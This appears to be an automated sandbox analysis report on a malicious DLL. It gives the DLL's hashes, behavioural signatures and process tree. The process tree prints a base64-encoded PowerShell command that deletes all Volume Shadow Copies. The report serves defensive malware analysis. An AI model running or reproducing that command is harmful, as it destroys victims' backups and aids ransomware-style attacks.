Analysis
-
max time kernel
117s -
max time network
137s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
24-01-2022 00:57
Static task
static1
Behavioral task
behavioral1
Sample
d6a0b7812b3ee8fbf81d40db94094facc25645689f4109e5d7983e8cb49990ec.dll
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
d6a0b7812b3ee8fbf81d40db94094facc25645689f4109e5d7983e8cb49990ec.dll
Resource
win10-en-20211208
General
-
Target
d6a0b7812b3ee8fbf81d40db94094facc25645689f4109e5d7983e8cb49990ec.dll
-
Size
164KB
-
MD5
c37804708ee284575f87bd0e365be9d9
-
SHA1
7b8f73cd90e344db7a4697fb6731cd953b1dfe03
-
SHA256
d6a0b7812b3ee8fbf81d40db94094facc25645689f4109e5d7983e8cb49990ec
-
SHA512
f2cca7e4bad7d683d47e5fc7fabb79024a8d5932b2b0206b11e66a2cae52d4e50626d3f0494cc3709885e1e40985295dee0eb02e7e44e7dfbb3b6fa7b30e4427
Malware Config
Signatures
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
rundll32.exedescription ioc process File opened (read-only) \??\P: rundll32.exe File opened (read-only) \??\R: rundll32.exe File opened (read-only) \??\S: rundll32.exe File opened (read-only) \??\X: rundll32.exe File opened (read-only) \??\Z: rundll32.exe File opened (read-only) \??\O: rundll32.exe File opened (read-only) \??\H: rundll32.exe File opened (read-only) \??\I: rundll32.exe File opened (read-only) \??\J: rundll32.exe File opened (read-only) \??\F: rundll32.exe File opened (read-only) \??\E: rundll32.exe File opened (read-only) \??\G: rundll32.exe File opened (read-only) \??\K: rundll32.exe File opened (read-only) \??\N: rundll32.exe File opened (read-only) \??\Q: rundll32.exe File opened (read-only) \??\V: rundll32.exe File opened (read-only) \??\W: rundll32.exe File opened (read-only) \??\B: rundll32.exe File opened (read-only) \??\Y: rundll32.exe File opened (read-only) \??\L: rundll32.exe File opened (read-only) \??\M: rundll32.exe File opened (read-only) \??\T: rundll32.exe File opened (read-only) \??\U: rundll32.exe File opened (read-only) \??\A: rundll32.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
rundll32.exepowershell.exepid process 1632 rundll32.exe 268 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 268 powershell.exe Token: SeBackupPrivilege 804 vssvc.exe Token: SeRestorePrivilege 804 vssvc.exe Token: SeAuditPrivilege 804 vssvc.exe -
Suspicious use of WriteProcessMemory 11 IoCs
Processes:
rundll32.exerundll32.exedescription pid process target process PID 1292 wrote to memory of 1632 1292 rundll32.exe rundll32.exe PID 1292 wrote to memory of 1632 1292 rundll32.exe rundll32.exe PID 1292 wrote to memory of 1632 1292 rundll32.exe rundll32.exe PID 1292 wrote to memory of 1632 1292 rundll32.exe rundll32.exe PID 1292 wrote to memory of 1632 1292 rundll32.exe rundll32.exe PID 1292 wrote to memory of 1632 1292 rundll32.exe rundll32.exe PID 1292 wrote to memory of 1632 1292 rundll32.exe rundll32.exe PID 1632 wrote to memory of 268 1632 rundll32.exe powershell.exe PID 1632 wrote to memory of 268 1632 rundll32.exe powershell.exe PID 1632 wrote to memory of 268 1632 rundll32.exe powershell.exe PID 1632 wrote to memory of 268 1632 rundll32.exe powershell.exe
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\d6a0b7812b3ee8fbf81d40db94094facc25645689f4109e5d7983e8cb49990ec.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:1292 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\d6a0b7812b3ee8fbf81d40db94094facc25645689f4109e5d7983e8cb49990ec.dll,#12⤵
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1632 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:268
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:804
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/268-56-0x000007FEFB5B1000-0x000007FEFB5B3000-memory.dmpFilesize
8KB
-
memory/268-57-0x000007FEF2810000-0x000007FEF336D000-memory.dmpFilesize
11.4MB
-
memory/268-58-0x00000000028D0000-0x00000000028D2000-memory.dmpFilesize
8KB
-
memory/268-59-0x00000000028D2000-0x00000000028D4000-memory.dmpFilesize
8KB
-
memory/268-60-0x00000000028D4000-0x00000000028D7000-memory.dmpFilesize
12KB
-
memory/268-61-0x00000000028DB000-0x00000000028FA000-memory.dmpFilesize
124KB
-
memory/1632-55-0x0000000075AB1000-0x0000000075AB3000-memory.dmpFilesize
8KB